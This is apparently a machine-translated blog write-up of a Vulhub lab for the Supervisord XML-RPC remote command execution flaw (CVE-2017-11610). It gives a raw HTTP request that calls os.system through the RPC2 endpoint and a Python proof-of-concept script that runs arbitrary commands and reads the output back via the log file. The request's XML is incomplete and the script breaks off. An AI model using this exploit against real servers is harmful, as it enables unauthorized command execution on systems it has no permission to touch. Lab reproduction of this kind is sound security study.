当前位置：网站首页>Vulhub vulnerability recurrence 67_ Supervisor

Vulhub vulnerability recurrence 67_ Supervisor

2022-07-06 05:16:00 【Revenge_ scan】

CVE-2017-11610_ Supervisord Remote command execution vulnerability

Preface

Supervisor（http://supervisord.org/） Yes, it is Python One developed client/server service , yes Linux/Unix A process management tool under the system , I won't support it Windows System . It's easy to monitor 、 start-up 、 stop it 、 Restart one or more processes .

Reference link ：

- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

- https://blogs.securiteam.com/index.php/archives/3348

-https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b

Vulnerability environment

shooting range ：192.168.4.10_ubuntu

#docker-compose build

docker-compose up -d

After the environment starts , visit `http://your-ip:9001` You can view it Supervisord The page of .

Vulnerability testing

Execute arbitrary commands directly ：

```

POST /RPC2 HTTP/1.1

Host: localhost

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 213

<?xml version="1.0"?>

<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>

<param>

<string>touch /tmp/success</string>

</param>

</params>

</methodCall>

```

Container view success Create success

## About direct echo POC

@Ricter An idea put forward on Weibo , Very effective , Is to write the result of the command execution to log In file , Call again Supervisord Self contained readLog Method reading log file , Read the results .

Write a simple POC： [poc.py](poc.py), Post it directly ：

```python

#!/usr/bin/env python3

import xmlrpc.client

import sys

target = sys.argv[1]

command = sys.argv[2]

with xmlrpc.client.ServerProxy(target) as proxy:

old = getattr(proxy, 'supervisor.readLog')(0,0)

logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()

getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))

result = getattr(proxy, 'supervisor.readLog')(0,0)